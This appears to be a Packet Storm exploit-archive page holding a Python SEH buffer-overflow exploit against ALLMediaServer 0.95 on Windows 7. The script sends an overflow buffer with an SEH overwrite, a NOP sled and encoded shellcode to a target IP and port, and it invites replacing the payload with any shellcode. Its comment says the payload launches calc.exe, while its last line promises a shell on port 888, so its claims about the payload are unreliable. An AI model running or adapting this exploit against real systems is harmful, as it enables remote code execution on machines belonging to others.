what you don't know can hurt you

ALLMediaServer 0.95 Overflow For Win 7

ALLMediaServer 0.95 Overflow For Win 7
Posted Aug 21, 2013
Authored by metacom

ALLMediaServer version 0.95 SEH overflow exploit written for Windows 7 German.

tags | exploit, overflow
systems | windows, 7
MD5 | d32b7646cd4ed4f7eb923ad473d79034

ALLMediaServer 0.95 Overflow For Win 7

Change Mirror Download
#!/usr/bin/python
print
"""
[+] Exploit Title: ALLMediaServer 0.95 SEH Overflow Exploit
[+] Date: 21/08/2013
[+] Exploit Author: metacom
[+] Romanian Security Team
[+] Software Link:http://allmediaserver.org/download
[+] Version: ALLMediaServer 0.95
[+] Tested On: Windows 7 German
[+] ALLMediaServer run online mod and try two or three times to run exploit
"""
import time
import socket
import sys

if len(sys.argv) != 3:
print "Usage: ./exploit.py <Target IP> <Target Port>"
sys.exit(1)

target = sys.argv[1]
port = int(sys.argv[2])

buffer = "http://" + "\x41" * 1065

nseh = "\xEB\x06\xFF\xFF"

seh = "\x3c\x17\x42\x00" #0x0042173c

nops = "\x90" * 50
#msfpayload windows/exec CMD=calc.exe R | msfencode -b '\x00' -e x86/shikata_ga_nai -t c
# you can replace the shellcode with any shellcode u want
shell = ("\xb8\x66\xa5\xa3\x41\xdb\xd5\xd9\x74\x24\xf4\x5b\x33\xc9\xb1"
"\x33\x31\x43\x12\x83\xc3\x04\x03\x25\xab\x41\xb4\x55\x5b\x0c"
"\x37\xa5\x9c\x6f\xb1\x40\xad\xbd\xa5\x01\x9c\x71\xad\x47\x2d"
"\xf9\xe3\x73\xa6\x8f\x2b\x74\x0f\x25\x0a\xbb\x90\x8b\x92\x17"
"\x52\x8d\x6e\x65\x87\x6d\x4e\xa6\xda\x6c\x97\xda\x15\x3c\x40"
"\x91\x84\xd1\xe5\xe7\x14\xd3\x29\x6c\x24\xab\x4c\xb2\xd1\x01"
"\x4e\xe2\x4a\x1d\x18\x1a\xe0\x79\xb9\x1b\x25\x9a\x85\x52\x42"
"\x69\x7d\x65\x82\xa3\x7e\x54\xea\x68\x41\x59\xe7\x71\x85\x5d"
"\x18\x04\xfd\x9e\xa5\x1f\xc6\xdd\x71\x95\xdb\x45\xf1\x0d\x38"
"\x74\xd6\xc8\xcb\x7a\x93\x9f\x94\x9e\x22\x73\xaf\x9a\xaf\x72"
"\x60\x2b\xeb\x50\xa4\x70\xaf\xf9\xfd\xdc\x1e\x05\x1d\xb8\xff"
"\xa3\x55\x2a\xeb\xd2\x37\x20\xea\x57\x42\x0d\xec\x67\x4d\x3d"
"\x85\x56\xc6\xd2\xd2\x66\x0d\x97\x2d\x2d\x0c\xb1\xa5\xe8\xc4"
"\x80\xab\x0a\x33\xc6\xd5\x88\xb6\xb6\x21\x90\xb2\xb3\x6e\x16"
"\x2e\xc9\xff\xf3\x50\x7e\xff\xd1\x32\xe1\x93\xba\x9a\x84\x13"
"\x58\xe3")


payload = buffer + nseh + seh + nops + shell
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((target, port))
print "[+] Connected"
except:
print "[!] Connection Failed"
sys.exit(0)

print "[+] Sending payload..."
s.send(payload)
time.sleep(1)
s.close()

print "[+] Check port 888 for your shell"

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    2 Files
  • 2
    Jul 2nd
    3 Files
  • 3
    Jul 3rd
    15 Files
  • 4
    Jul 4th
    4 Files
  • 5
    Jul 5th
    15 Files
  • 6
    Jul 6th
    15 Files
  • 7
    Jul 7th
    10 Files
  • 8
    Jul 8th
    2 Files
  • 9
    Jul 9th
    10 Files
  • 10
    Jul 10th
    15 Files
  • 11
    Jul 11th
    15 Files
  • 12
    Jul 12th
    19 Files
  • 13
    Jul 13th
    16 Files
  • 14
    Jul 14th
    15 Files
  • 15
    Jul 15th
    3 Files
  • 16
    Jul 16th
    2 Files
  • 17
    Jul 17th
    8 Files
  • 18
    Jul 18th
    11 Files
  • 19
    Jul 19th
    15 Files
  • 20
    Jul 20th
    15 Files
  • 21
    Jul 21st
    15 Files
  • 22
    Jul 22nd
    7 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close